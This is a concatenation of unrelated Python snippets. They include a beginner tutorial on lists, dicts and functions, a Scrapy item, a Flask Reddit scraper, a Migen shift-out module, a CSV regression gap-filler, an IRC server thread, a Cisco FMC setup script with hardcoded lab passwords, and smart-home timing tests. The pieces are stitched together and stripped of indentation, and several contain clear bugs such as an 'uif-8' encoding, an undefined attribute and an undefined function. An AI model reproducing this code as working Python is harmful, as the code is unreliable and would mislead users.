ro_scheduler.cell, instance, 'servers'
)
|
squre = [1,2,3,4,5,6]
print(squre)
squre[0] = "a"
squre.append("asdj")
squre.extend([1,2,4])
print(squre)
ourList = [1,2,3,4,5,6,7,8,9,10]
print(ourList)
print(ourList[0])
print(ourList[-1])
print(ourList[0:9])
print(ourList[:9])
print(ourList[0:])
print(ourList[:])
print(ourList[0:9:2])
print(ourList[::2])
print(ourList[::-1])
'''
'''
ourList = range(20)
print(ourList)
print(ourList[0])
print(ourList[-1])
print(ourList[0:10])
print(ourList[:13])
print(ourList[0:])
print(ourList[:])
print(ourList[0:10:2])
print(ourList[::2])
print(ourList[::-1])
ourList = [1,2,3,4,5,6,7,8,9,10]
print(ourList)
ourList[0] = "a"
print(ourList)
ourStr = "123"
print(ourStr)
ourStr[0] = "a"
print(ourStr)
#列表的添加
example = ["a","b","c","d","e","f"]
example.append("g")
example.append(["h","i"])
example.extend(['j','k'])
example.insert(0,"l")
example.insert(-1,"m")
example.insert(-2,"n")
example.append(example)
print(example)
print(example[-1])
print(example[-1][-1])
print(example.append(example))
example = ["a","b","c","d","e","f"]
print(example)
example.append("g")
print(example[-1])
print(example[-1][-1])
example.append(example)
print(example[-1])
print(example[-1][-1])
example.append(example)
print(example.append(example))
#列表的删除
example = [1,2,3,4,5,6,7,8,9]
print(example)
print(example.pop())
print(example.pop(3))
example.remove(2)
print(example)
#列表的查找
example = list("helloworld")
print(example)
print(example.count("l"))
print(example.index("o"))
print(example.index("a"))
#元组的索引
ourTuple = tuple("0123456789")
print(ourTuple)
print(ourTuple[0])
print(ourTuple[2])
print(ourTuple[-1])
print(ourTuple[0:6])
print(ourTuple[0:])
print(ourTuple[:])
print(ourTuple[:9])
print(ourTuple[0:9:2])
print(ourTuple[::2])
print(ourTuple[::-1])
a = (1,2,3)
a[1] = 1
#元组的方法
a = tuple("hello world")
print(a)
print(a.count("l"))
print(a.index("o"))
print(zip((1,2,3),["a","b","c"],"def"))
print({"a":1,"b":2,"c":3})
print(dict([(1,2),("a",1),("b",3)]))
print(dict(zip("abcde",range(1,6))))
print({"a":1,"b":2,"c":3})
#字典的方法
ourDict = dict(zip("hello","12345"))
print(ourDict)
print(ourDict.keys())
print(ourDict.values())
print(ourDict.get("h"))
print(ourDict["o"])
print(ourDict.get("w","not found"))
ourDict.update(w = 3)
print(ourDict.setdefault("w","16"))
print(ourDict.setdefault("h","16"))
print(ourDict)
ourDict = dict(zip("hello","12345"))
print(ourDict)
print(ourDict.pop("h"))
print(ourDict.popitem())
print(ourDict.popitem())
print('2' in ourDict)
print('e' in ourDict)
ourDict.clear()
print(ourDict)
# 字典的拷贝
ourDict = {"a":1,"b":2,"c":3,"d":4,"e":5,"1":[1,2]}
otherDict = ourDict.copy()
ourDict["a"] = 3
ourDict["1"][1] = "a"
ourDict["1"] = 3
print(ourDict)
print(otherDict)
ourDict = dict(zip("hello","12345"))
print(ourDict)
#以键取值
print(ourDict["l"])
ourDict["l"] = "hi"
print(ourDict)
print({1:"a","a":{2:3},(1,2):3})
#字典的迭代模式
ourDict = dict(zip("hello","12345"))
print(ourDict.items())
print(ourDict.keys())
print(ourDict.values())
num = 5
num += 1 #--->num = num + 1
print(num)
num *= 2 #--->num = num * 2
print(num)
#比较运算
print(1<2)
print(1>2)
print(1 == 1.0)
print(1 == 1)
print(1 == 2)
print(1 >= 2)
print(1 <= 2)
print(1 != 2)
print(1 != 1)
print(2 is 1)
a = 3
b = 3
print(a is b)
print(id(a))
print(id(b))
print(1 is 1.0)
print(id(1))
print(id(1.0))
print("a"is "b")
print("a" is "a")
print("a" > "b")
print("bacd" > "bcad")
print(ord("a"))
print(ord("A"))
print(chr(97))
print(chr(122))
print(chr(65))
print(chr(90))
print(True and True)
print(True and False)
print(False and False)
print(True or True)
print(True or False)
print(False or False)
print(not True)
print(not False)
num = 11
if num < 15:
if num > 8:#这里大于8这个判断的前提条件是满足num小于15
print("15 > num > 8")
else:
if num > 17:#这里大于17这个判断的前提条件是满足num大等于15
print("num > 17")
num = 18
if num < 15:
if num > 8:#这里大于8这个判断的前提条件是满足num小于15
print("15 > num > 8")
else:
if num > 17:#这里大于17这个判断的前提条件是满足num大等于15
print("num > 17")
num = 10
# if elif 是一个判断,一个条件执行后就不会有第二个条件执行
if num < 100:
print("<100")
elif num < 30:
print("<30")
num = 10
# if if是两个不同的判断,互不影响
if num < 30:
print("<30")
if num < 100:
print("<100")
num = 10
if num < 30:
print("<30")
elif num < 100:
print("<100")
if num < 100:
print("<100")
elif num < 30:
print("<30")
#if判断
num = 10
if num == 1: #如果num == 1为真
print("num is 1")
elif num == 2:
print("num is 2")
elif num == 3:
print("num is 3")
else:
print("I don't know")
#for循环
for num in range(5): #声明了num变量和range(10)序列。并将range(10)当中的元素依次赋值给num
print(num) #语句的语句块,每次循环都会执行
for n in "abcde":
print(n)
print("so cool")
#特殊的for 循环
for m,n in [(1,2),(3,4),(5,6)]:#m,n = (1,2) m,n = (3,4) m,n = (5,6)
print("m:%s"%m)
print("m:%s"%n)
#enmerate 枚举
string = "abcdefg"
enStr = enumerate(string)
print(string)
print(enStr)
for index,string in enStr:
print(index,string)
#无参函数
def Say_hello():
print("hello world")
#有参函数
Say_hello()
def say_hello(name,age):
print("hello %s,he is %s years old"%(name,age))
say_hello("feng",18)
def say_hello(name,age):
print("hello %s,he is %s years old"%(name,age))
say_hello("feng",18)
say_hello(18,"feng")
def say_hello(name,age = 18):
print("hello %s ,he is %s years old"%(name,age))
say_hello(name = "feong",age = 16)
say_hello(age = 17,name = "feong")
say_hello(name = "feong")
def say_hello(**arges):
print(arges)
say_hello()
say_hello(a = 1)
say_hello(a = 1,b = 2,c = 3,d = 4, e = 5)
say_hello(1,2,3)
say_hello(a= 1,b = 2, c = 3)
say_hello(1, b = 2, c = 3)
def say_hello(*arges,**kwd):
print(arges)
print(kwd)
say_hello(1,2,3)
def say_hello():
print("hello world")
def Say_hello():
return("hello world","nihao")
print("nihao")
print(type(say_hello()))
print(type(Say_hello()))
print(Say_hello())
print(map(hello, range(1, 6), range(6, 11)))
def hello(a, b):
return a + b
print(hello(1,2))
print(list(map(hello,range(1,3),range(3,5))))
def calc(numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
#但是调用的时候,需要先组装出一个list或tuple:
print(calc([1, 2, 3]))
print(calc((1,3,5,7)))
def calc(*numbers):
sum = 0
for n in numbers:
sum = sum + n * n
return sum
print(calc(1,2))
print(calc(1,3,5,7))
def person(name, age, *, city, job):
print(name, age, city, job)
print (person('Jack', 24, city='Beijing', job='Engineer'))
def f1(a, b, c=0, *args, **kw):
print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
print(f1(1,2))
print(f1(1,2,c = 3))
print(f1(1,5,3,'a','b'))
print(f1(1,2,6,'a','b',x = 99))
print(f2(1,2,d = 89, ext = None))
|
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class CinemaItem(scrapy.Item):
# 电影院名字
cinema_name = scrapy.Field()
# 区
district = scrapy.Field()
# 上映电影的图片地址
online_moive = scrapy.Field()
# 地址
address = scrapy.Field()
# 电话
telephone = scrapy.Field()
# 图片
img_url = scrapy.Field()
|
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='uif-8') as f:
long_description = f.read()
setup(
name='aCrawler',
version='0.0.1',
url='https://github.com/sumantmani/aCrawler',
author='Sumant Mani',
author_email='sumant.mani@outlook.com',
license='MIT',
classifiers=[
'Development Status :: 3 -Alpha',
'Programming Language :: Python :: 3.6',
],
keywords='A simple web crawler',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=[],
# $ pip install -e .[dev, test]
extras_require={
'dev': ['check-mainfest'],
'test': ['coverage'],
},
)
|
import tensorflow as tf
hello = tf.constant("Merhaba, TensorFlow")
sess = tf.Session()
print(sess.run(hello))
|
from flask import Flask, render_template
from bs4 import BeautifulSoup
import json
import urllib
import time
app = Flask(__name__)
@app.route('/')
def main():
ROOT_URL = 'http://www.reddit.com/'
page = urllib.urlopen('http://www.reddit.com/.json?limit=80')
j = json.loads(page.read())
images = []
galleries = []
# pulling image urls and post links from json object
for c in j['data']['children']:
if (c['data']['url'][-3:] in ('jpg', 'png', 'gif')) or c['data']['url'][-4:] == 'jpeg':
images.append([c['data']['url'], ROOT_URL + c['data']['permalink']])
elif c['data']['url'][7:12] == 'imgur':
imgs = get_imgur_imgs(c['data']['url'])
if imgs:
galleries.append(imgs)
# setting current date and time
d = time.strftime("%A, %B %d, %Y")
t = time.strftime("%H:%M:%S")
return render_template('base.html', date=d, time=t, images=images, galleries=galleries)
def get_imgur_imgs(url):
img_links = []
try: htmltext = urllib.urlopen(url).read()
except: return None
soup = BeautifulSoup(htmltext)
# not all Imgur galleries have div id=image-container
# this will have to be fixed
start_div = soup.find('div', {'id': 'image-container'})
if start_div:
for tag in start_div.findAll('img'):
try: img_links.append(tag['data-src'])
except: pass
else:
return None
return img_links
app.debug = True
app.run() |
#!/usr/bin/env python3
import os
# Put me in the user's crontab
def updateUser():
os.system("flatpak update --user")
updateUser() |
from migen import *
# import tinyPlatform
""" ShiftOut
This reads from memory and shifts out, in parallel, the data for all 8 panels.
This needs to shift 64 bits at a max frequency (thoeretically 8MHz) but probably
more likely <=4MHz.
The panels will be rewritten to allow an element of PWM fade control of the tubes.
Therefore, the panels will be rewritten every 10 ms (100Hz).
"""
class ShiftOut(Module):
def __init__(self):
# Internal signals
self.PWM_clk = Signal(8) ## Clock to trigger the next shift out.
self.PWM_shift = Signal(1) # Flag to trigger shifting out the data
self.panel_buffer1 = Signal(64)
self.buf_cnt = Signal(7)
# GPIO
# clock, strobe and OE are shared
self.clock = Signal()
self.strobe = Signal()
self.OE = Signal()
# Each panel has a separate data line
self.data1 = Signal()
self.comb += [
If(self.PWM_clk == 10,
self.PWM_shift.eq(1),
)
]
self.sync += [
self.PWM_clk.eq(self.PWM_clk + 1)
]
self.submodules.shifterFSM = FSM(reset_state='IDLE')
# IDLE
self.shifterFSM.act('IDLE',
If(self.PWM_shift,
NextValue(self.OE, 0), # Turns all tubes off while we shift out the data. This prevents ghosting
NextValue(self.buffer, 0xAAAAAAAAAAAAAAAA),
NextValue(self.buf_cnt, 0),
NextValue(self.strobe, 1),
NextState('CLOCK')
)
)
self.shifterFSM.act('CLOCK',
If(self.clock,
NextValue(self.clock, 0),
NextState('DATA') # data read on falling edge, so set data in next state
).Else(
NextValue(self.clock, 1),
NextState('CLOCK_HOLD')
)
)
self.shifterFSM.act('DATA',
If((self.buffer & 0x01),
NextValue(self.data1, 1)
).Else(
NextValue(self.data1, 0)
),
NextValue(self.buf_cnt, self.buf_cnt + 1),
If(self.buf_cnt == 64,
NextValue(self.OE, 1), # Turn the tubes back on
NextValue(self.strobe, 0),
NextState('IDLE')
).Else(
NextValue(self.buffer, self.buffer >> 1),
NextState('CLOCK')
)
)
self.shifterFSM.act('CLOCK_HOLD',
NextState('CLOCK') # This is just a holding state to waste 1 clock
)
def counter_test(dut):
for i in range(1000):
yield # clock the sync
if __name__ == "__main__":
dut = ShiftOut()
run_simulation(dut, counter_test(dut), vcd_name="shift.vcd")
|
import time
from subprocess import Popen, PIPE
prog = Popen("~/Desktop/Drone/reader.py", shell=True, stdin=PIPE, stdout=PIPE)
prog.stdin.write("This will go to script A\n")
print prog.stdout.read()
prog.wait()
|
"""
-------------------------------------------------------------------------------
Name: DataChaser
Format: .py
Autors:
-Saúl Contreras (SuulCoder)
-Luis Quezada (Lfquezada)
-Marco Fuentes (marcofuentes05)
'Fireball_And_Bolide_Reports.csv'
Use:
This program is useful to recover the data that has been lost by
some sensors of the Nasa. This is a proyect for the SpaceApp
Challege 2019. This algorithm uses a Machine Learning
process, libraries from Python and statistics regressions.
-------------------------------------------------------------------------------
"""
#Import all libraries
import pandas as pd #import the pandas module
import numpy as np
import csv
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures # So that we can work with non linear models
#------------------------------------------------------------------------------
class Value(object):
"""This class represents a value that has uncertainty.
The objective for this class is to reduce the
uncertainty based on differnt models given by the
user. Based on posible values with an uncertainty to
get a value with no uncertainty.
atributes:
-value: float type, has the current value
-bottom: float type that has the low limit of the uncertainty
-top: float type that has the top value of the uncertaintly
methods:
-add
-getBottom
-getTop
-getValue
"""
def __init__(self, value,bottom,top):
super(Value, self).__init__()
self.value = value
self.bottom = bottom
self.top = top
def add(self,value,bottom,top):
"""add: This method recevies the following parameters:
value: float type with a possible value
bottom: its low uncertainty
top: its up uncertainty
This method is useful to add a new possible value and uncertainty
to the Value class and update the information
"""
if(self.bottom!=self.top):
if(self.bottom<=bottom and self.top>=top):
self.bottom=bottom
self.top=top
elif((self.bottom>bottom and self.top>=top and top>self.bottom) or (self.bottom<=bottom and self.top<top and bottom>self.top)):
self.top=top
elif((self.bottom<=bottom and self.top<top and bottom<self.top) or (self.bottom>bottom and self.top>=top and top<self.bottom)):
self.bottom=bottom
elif(self.bottom>bottom and self.top>=top):
self.bottom=bottom
self.value=((self.bottom+self.top)/2)
def getValue(self):
return self.value
def getBottom(self):
return self.bottom
def getTop(self):
return self.top
#------------------------------------------------------------------------------
class Chaser(object):
"""This class represents the chase that will do all the logic for an
specific incomplete data stored in a .csv document.
atributes:
-Filename: It contains the path of the .csv file
-trainData: Data to train
-currentData: Is the data that will be filled
-titles: titles of floating point information
-alltitles: titles no matter the type
methods:
-trainDataBuilder
-LinearRegression
-Transposed
-getDataToChase
-store
"""
def __init__(self, filename,saveFile):
super(Chaser, self).__init__()
self.filename = filename
self.trainData = []
self.saveFile = saveFile
self.currentData = []
self.titles = []
self.allTitles = []
self.indexes = []
self.index = []
self.realData = []
def trainDataBuilder(self):
"""
This function get all the data that is useful as reference to get
points for do the different types of regressions. It returns a
list of strings with the names of the categories.
"""
data = []
allTitles = []
titles = []
index = []
with open(self.filename) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line = 0
for row in csv_reader:
if(line==0):
allTitles=row
else:
control = True
for element in row:
if(element==''):
control = False
if(control):
count = 0
currentRow = []
for element in row:
try:
currentRow.append(float(element))
if(index.count(count)==0):
index.append(count)
if(titles.count(allTitles[count])==0):
titles.append(allTitles[count])
except:
pass
count+=1
data.append(currentRow)
line+=1
with open('trainData.csv', mode='w') as data_file:
data_file = csv.writer(data_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data_file.writerow(titles)
for currentData in data:
data_file.writerow(currentData)
self.trainData = self.Transposed(data)
self.titles = titles
self.allTitles = allTitles
self.index = index
return titles
def Transposed(self,matrix):
try:
return [[matrix[j][i] for j in range(len(matrix))] for i in range(len(matrix[0]))]
except Exception as e:
print("""Please check that the data is correct or:
-eliminate the category that contains floats and strings at the same time.
-eliminate the category that has strings and empty spaces at the same time""")
def dataParser(self,fileName):
data = []
with open(fileName) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line = 0
for row in csv_reader:
objInfo = {}
if line == 0:
titles = row
else:
for i in range(len(row)):
objInfo[titles[i]] = row[i]
data.append(objInfo)
line += 1
print(f'{line} events processed.')
return data
def printData(self,data):
"""
print all parsed data
"""
for event in data:
for title,info in event.items():
print(f'{title}: {info}')
print('\n')
def getDataToChase(self):
"""
Get data to chase, the data to complete
"""
realData = []
data = self.dataParser(self.filename)
Parsedlist = [] #Getting all the information in lists
for event in data:
trainList = []
realList = []
for title,info in event.items():
realList.append(info)
try:
trainList.append(Value(float(info),float(info),float(info)))
except:
if(info==''):
trainList.append('')
Parsedlist.append(trainList)
realData.append(realList)
self.realData = realData
self.currentData = self.Transposed(Parsedlist)
def LinearRegression(self):
"""
This function will get all possible values for the empty spaces
based on liner regression. It receives a list of strings with
the name of the parameters and it will return a list of possible
Value type (Class)
"""
file = pd.read_csv ('trainData.csv', sep=',')
model = LinearRegression()
result = []
for i in range(0,len(self.titles)):
indexes = []
for j in range(0,len(self.titles)):
if(i!=j):
X = file.iloc[:, i].values.reshape(-1, 1) # values converts it into a numpy array
Y = file.iloc[:, j].values.reshape(-1, 1) # -1 means that calculate the dimension of rows, but have 1 column
model.fit(X, Y) # perform linear regression
unc = 1-model.score(X, Y)
if(j==0):
count = 0
for element in self.currentData[i]:
if(element==''):
indexes.append(count)
try:
t = (model.coef_)*(self.currentData[j][count].getValue())+model.intercept_
t = t[0][0]
element = Value(t,t-(unc*t),t+(unc*t))
except:
pass
count+=1
else:
self.indexes = indexes
for index in indexes:
if(self.currentData[j][index]!=''):
t = (model.coef_)*(self.currentData[j][index].getValue())+model.intercept_
t = t[0][0]
try:
self.currentData[i][index].add(t,t-(unc*t),t+(unc*t))
except:
self.currentData[i][index] = Value(t,t-(unc*t),t+(unc*t))
def quadraticRegression(self):
file = pd.read_csv ('trainData.csv', sep=',')
pf = PolynomialFeatures(degree = 2)
result = []
for i in range(0,len(self.titles)):
indexes = []
for j in range(0,len(self.titles)):
if(i!=j):
X = file.iloc[:, i].values.reshape(-1, 1) # values converts it into a numpy array
Y = file.iloc[:, j].values.reshape(-1, 1) # -1 means that calculate the dimension of rows, but have 1 column
X_1 = pf.fit_transform(X.reshape(-1,1))
model = LinearRegression()
model.fit(X_1, Y) # perform linear regression
# print(str(model.coef_))
unc = 1-model.score(X_1, Y)
if(j==0):
count = 0
for element in self.currentData[i]:
if(element==''):
indexes.append(count)
try:
t = (model.coef_[2])*(self.currentData[j][count].getValue())**2 + (model.coef_[1])*(self.currentData[j][count].getValue())+model.intercept_
t = t[0][0]
element = Value(t,t-(unc*t),t+(unc*t))
except:
pass
count+=1
else:
self.indexes = indexes
for index in indexes:
if(self.currentData[j][index]!=''):
t = (model.coef_)*(self.currentData[j][index].getValue())+model.intercept_
t = t[0][0]
try:
self.currentData[i][index].add(t,t-(unc*t),t+(unc*t))
except:
self.currentData[i][index] = Value(t,t-(unc*t),t+(unc*t))
def cubicRegression(self):
file = pd.read_csv ('trainData.csv', sep=',')
pf = PolynomialFeatures(degree = 3)
result = []
for i in range(0,len(self.titles)):
indexes = []
for j in range(0,len(self.titles)):
if(i!=j):
X = file.iloc[:, i].values.reshape(-1, 1) # values converts it into a numpy array
Y = file.iloc[:, j].values.reshape(-1, 1) # -1 means that calculate the dimension of rows, but have 1 column
X_1 = pf.fit_transform(X.reshape(-1,1)) #Makes it polynomial
model = LinearRegression()
model.fit(X_1, Y) # perform linear regression
unc = 1-model.score(X_1, Y)
if(j==0):
count = 0
for element in self.currentData[i]:
if(element==''):
indexes.append(count)
try:
t = (model.coef_[3])*(self.currentData[j][count].getValue())**3 +(model.coef_[2])*(self.currentData[j][count].getValue())**2 + (model.coef_[1])*(self.currentData[j][count].getValue())+model.intercept_
t = t[0][0]
element = Value(t,t-(unc*t),t+(unc*t))
except:
pass
count+=1
else:
self.indexes = indexes
for index in indexes:
if(self.currentData[j][index]!=''):
t = (model.coef_)*(self.currentData[j][index].getValue())+model.intercept_
t = t[0][0]
try:
self.currentData[i][index].add(t,t-(unc*t),t+(unc*t))
except:
self.currentData[i][index] = Value(t,t-(unc*t),t+(unc*t))
def isLike(self,current, toCompare,param):
"""
This method evaluates 2 lists and returns true if their numerical values are similar. False otherwise
"""
total = 0
size = len(current)
if (size != len(toCompare)):
return False
else:
for i in range(size):
try:
total += abs(current[i] - toCompare[i])/current[i]
except:
total +=0
prom = total/size
if (prom <= param):
return True
else:
return False
def relativeRegression(self):
data = self.Transposed(self.currentData) #Python matrix
a = np.array(data) #numpy matrix
cont = 0
for i in range(len(a)):
for j in range(len(a[i])):
if (a[i][j] == ''):
for k in a:
if (self.isLike(k,a[i],0.5) and k[j] != ''):
a[i][j] = k[j]
data = a
self.currentData = self.Transposed(data)
def store(self):
"""
Store all the data in a csv name
"""
name = self.saveFile
with open(name, mode='w') as data_file:
data_file = csv.writer(data_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
data_file.writerow(self.allTitles)
matrix = self.Transposed(self.currentData)
firstCount=0
for row in matrix:
values = []
count = 0
for element in row:
if(element!=''):
values.append(element.getValue())
else:
values.append('')
if(self.index.count(count)==0):
values.insert(count,self.realData[firstCount][count])
count+=1
index_count = 0
for val in values:
print(self.allTitles[index_count] + ": " + str(val))
index_count+=1
print("\n")
data_file.writerow(values)
firstCount+=1
print("Data stored in " + name)
#------------------------------------------------------------------------------
|
import threading
import socket
import re
import sys
import errno
import re
from user import IRCUser
class ServerThread(threading.Thread):
'''
Multi-threading clients.
'''
def __init__(self):
threading.Thread.__init__(self, daemon=True)
pass
def setup(self, __client, __address, server_instance, logger):
self.ircuser = IRCUser()
self.authenticated = False
self.joinedChannel = False
self.client = __client
self.address = __address
self.server_instance = server_instance
self.logger = logger
def isAuthenticated(self):
return self.authenticated
# def connect(self):
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
b = True
re_user = re.compile('(USER)\W(\S+)')
re_nick = re.compile('(NICK)\W(\S+)')
self.send_resp('Using IRC commands, please set your username and nickname\n USER <username>\n NICK <nickname>')
try:
while not self.authenticated:
try:
data = self.client.recv(1024)
if data:
m_user = re_user.match(str(data, 'utf-8'))
m_nick = re_nick.match(str(data, 'utf-8'))
if m_user:
self.ircuser.setUsername(m_user.group(2))
resp = 'USER set to ' + self.ircuser.getUsername()
self.send_resp(resp)
elif m_nick:
self.ircuser.setNickname(m_nick.group(2))
resp = 'NICK set to ' + self.ircuser.getNickname()
self.send_resp(resp)
if not self.ircuser.getUsername():
self.send_resp('Please set your username first using USER <username>')
elif not self.ircuser.getNickname():
self.send_resp('Please set your nickname using NICK <nickname>')
else:
self.authenticate()
else:
self.logger.debug('%s has disconnected', self.client)
break
except IOError as e:
if e.errno == errno.EPIPE:
print('IO Error', self.client)
b = False
except KeyboardInterrupt:
self.join()
self.joinChannel()
def authenticate(self):
self.authenticated = self.ircuser.isAuthenticated()
if self.authenticated:
resp = 'Welcome ' + self.ircuser.getNickname() + '! -- User authenticated -- '
self.send_resp(resp)
def joinChannel(self):
self.ircuser.joinChannel('#global')
self.joinedChannel = self.ircuser.joinedChannel()
resp = 'Joined channel ' + self.ircuser.getChannel()
self.send_resp(resp)
def send_resp(self, msg):
resp = 'client~'+msg
self.client.send(bytes(resp, 'utf-8'))
|
"""
Configure FMC for hq-ftd, register hq-ftd and push changes to it.
"""
import fmcapi # You can use 'from fmcapi import *' but it is best practices to keep the namespaces separate.
def main():
"""
The hq-ftd device already has 10.0.0.254 on its manage interface and the command 'configure network manager
10.0.0.10 cisco123' has already been manually typed on the FTD's CLI.
"""
# ### Set these variables to match your environment. ### #
host = "10.0.0.10"
username = "apiadmin"
password = "Admin123"
with fmcapi.FMC(
host=host,
username=username,
password=password,
autodeploy=True,
file_logging="hq-ftd.log",
) as fmc1:
# Create an ACP
acp = fmcapi.AccessPolicies(fmc=fmc1, name="ACP Policy")
acp.defaultAction = "BLOCK"
# I intentionally put a "space" in the ACP name to show that fmcapi will "fix" that for you.
acp.post()
# Create Security Zones
sz_inside = fmcapi.SecurityZones(
fmc=fmc1, name="inside", interfaceMode="ROUTED"
)
sz_inside.post()
sz_outside = fmcapi.SecurityZones(
fmc=fmc1, name="outside", interfaceMode="ROUTED"
)
sz_outside.post()
sz_dmz = fmcapi.SecurityZones(fmc=fmc1, name="dmz", interfaceMode="ROUTED")
sz_dmz.post()
# Create Network Objects
hq_dfgw_gateway = fmcapi.Hosts(
fmc=fmc1, name="hq-default-gateway", value="100.64.0.1"
)
hq_dfgw_gateway.post()
hq_lan = fmcapi.Networks(fmc=fmc1, name="hq-lan", value="10.0.0.0/24")
hq_lan.post()
all_lans = fmcapi.Networks(fmc=fmc1, name="all-lans", value="10.0.0.0/8")
all_lans.post()
hq_fmc = fmcapi.Hosts(fmc=fmc1, name="hq_fmc", value="10.0.0.10")
hq_fmc.post()
fmc_public = fmcapi.Hosts(fmc=fmc1, name="fmc_public_ip", value="100.64.0.10")
fmc_public.post()
# Create ACP Rule to permit hq_lan traffic inside to outside.
hq_acprule = fmcapi.AccessRules(
fmc=fmc1,
acp_name=acp.name,
name="Permit HQ LAN",
action="ALLOW",
enabled=True,
)
hq_acprule.source_zone(action="add", name=sz_inside.name)
hq_acprule.destination_zone(action="add", name=sz_outside.name)
hq_acprule.source_network(action="add", name=hq_lan.name)
hq_acprule.destination_network(action="add", name="any-ipv4")
# hq_acprule.logBegin = True
# hq_acprule.logEnd = True
hq_acprule.post()
# Build NAT Policy
nat = fmcapi.FTDNatPolicies(fmc=fmc1, name="NAT Policy")
nat.post()
# Build NAT Rule to NAT all_lans to interface outside
autonat = fmcapi.AutoNatRules(fmc=fmc1)
autonat.natType = "DYNAMIC"
autonat.interfaceInTranslatedNetwork = True
autonat.original_network(all_lans.name)
autonat.source_intf(name=sz_inside.name)
autonat.destination_intf(name=sz_outside.name)
autonat.nat_policy(name=nat.name)
autonat.post()
# Build NAT Rule to allow inbound traffic to FMC (Branches need to register to FMC.)
fmc_nat = fmcapi.ManualNatRules(fmc=fmc1)
fmc_nat.natType = "STATIC"
fmc_nat.original_source(hq_fmc.name)
fmc_nat.translated_source(fmc_public.name)
fmc_nat.source_intf(name=sz_inside.name)
fmc_nat.destination_intf(name=sz_outside.name)
fmc_nat.nat_policy(name=nat.name)
fmc_nat.enabled = True
fmc_nat.post()
# Add hq-ftd device to FMC
hq_ftd = fmcapi.DeviceRecords(fmc=fmc1)
# Minimum things set.
hq_ftd.hostName = "10.0.0.254"
hq_ftd.regKey = "cisco123"
hq_ftd.acp(name=acp.name)
# Other stuff I want set.
hq_ftd.name = "hq-ftd"
hq_ftd.licensing(action="add", name="MALWARE")
hq_ftd.licensing(action="add", name="VPN")
hq_ftd.licensing(action="add", name="BASE")
hq_ftd.licensing(action="add", name="THREAT")
hq_ftd.licensing(action="add", name="URLFilter")
# Push to FMC to start device registration.
hq_ftd.post(post_wait_time=300)
# Once registration is complete configure the interfaces of hq-ftd.
hq_ftd_g00 = fmcapi.PhysicalInterfaces(fmc=fmc1, device_name=hq_ftd.name)
hq_ftd_g00.get(name="GigabitEthernet0/0")
hq_ftd_g00.enabled = True
hq_ftd_g00.ifname = "IN"
hq_ftd_g00.static(ipv4addr="10.0.0.1", ipv4mask=24)
hq_ftd_g00.sz(name="inside")
hq_ftd_g00.put()
hq_ftd_g01 = fmcapi.PhysicalInterfaces(fmc=fmc1, device_name=hq_ftd.name)
hq_ftd_g01.get(name="GigabitEthernet0/1")
hq_ftd_g01.enabled = True
hq_ftd_g01.ifname = "OUT"
hq_ftd_g01.static(ipv4addr="100.64.0.200", ipv4mask=24)
hq_ftd_g01.sz(name="outside")
hq_ftd_g01.put()
# Build static default route for HQ FTD
hq_default_route = fmcapi.IPv4StaticRoutes(fmc=fmc1, name="hq_default_route")
hq_default_route.device(device_name=hq_ftd.name)
hq_default_route.networks(action="add", networks=["any-ipv4"])
hq_default_route.gw(name=hq_dfgw_gateway.name)
hq_default_route.interfaceName = hq_ftd_g01.ifname
hq_default_route.metricValue = 1
hq_default_route.post()
# Associate NAT policy with HQ FTD device.
devices = [{"name": hq_ftd.name, "type": "device"}]
assign_nat_policy = fmcapi.PolicyAssignments(fmc=fmc1)
assign_nat_policy.ftd_natpolicy(name=nat.name, devices=devices)
assign_nat_policy.post()
if __name__ == "__main__":
main()
|
from hue import HueControlUtil as hue
from wemo import WemoControlUtil as wemo
from alexa import AlexaControlUtil as alexa
import time, os, sys, argparse, datetime
def testWemoHueLocalRecipe(argv):
parser = argparse.ArgumentParser()
parser.add_argument("-iterNum", default = 5, type = int)
parser.add_argument("-lightId", default = 2, type = int)
parser.add_argument("-wemoport", type = int, default = 10085)
options = parser.parse_args(argv)
hueController = hue.HueController()
bind = "0.0.0.0:{}".format(options.wemoport)
switchName = "WeMo Switch1"
lightId = options.lightId
wemoController = wemo.WemoController(bind = bind)
switch = wemoController.discoverSwitch(switchName)
if switch is None:
print("error to locate the switch")
sys.exit(1)
else:
print("switch discoverred")
#test recipe: when wemo switch is truned on, turn on lights in living room
hueController.turnonLight(lightId)
time.sleep(3)
for index in range(options.iterNum):
print("start test iteration {}".format(index))
hueController.turnoffLight(lightId)
wemoController.turnoffSwitch(switchName)
#generate trigger event: turn on switch
wemoController.turnonSwitch(switchName)
print("switch turned one")
startTime = datetime.datetime.now()
while (True):
if hueController.isLightOn(lightId):
break
time.sleep(0.5)
endTime = datetime.datetime.now()
timeDiff = endTime - startTime
print("time cost for iter {} is {} seconds and microseconds {}".format(index, timeDiff.seconds, timeDiff.microseconds))
print("sleep before next test")
time.sleep(5)
def testAlexaHueRecipe(argv):
'''
test the following recipe:
If You say "Alexa trigger turn on hue light", then turn on lights in Living room
'''
parser = argparse.ArgumentParser()
parser.add_argument("-iterNum", default = 5, type = int)
parser.add_argument("-lightId", default = 2, type = int)
options = parser.parse_args(argv)
hueController = hue.HueController()
lightId = options.lightId
alexaController = alexa.AlexaController()
#test recipe: when wemo switch is truned on, turn on lights in living room
for index in range(options.iterNum):
hueController.turnoffLight(lightId)
#generate trigger event: speak to alexa: turn on hue light
alexaController.turnonHueLight()
print("send out voice command to alexa")
startTime = datetime.datetime.now()
while (True):
if hueController.isLightOn(lightId):
break
time.sleep(0.1)
endTime = datetime.datetime.now()
timeDiff = endTime - startTime
print("time cost for iter {} is {} seconds and microseconds {}".format(index, timeDiff.seconds, timeDiff.microseconds))
recipeTypeDict = {
"alexaHue" : testAlexaHueRecipe,
"wemoHue" : testWemoHueRecipe,
}
if __name__ == "__main__":
recipeName = sys.argv[1]
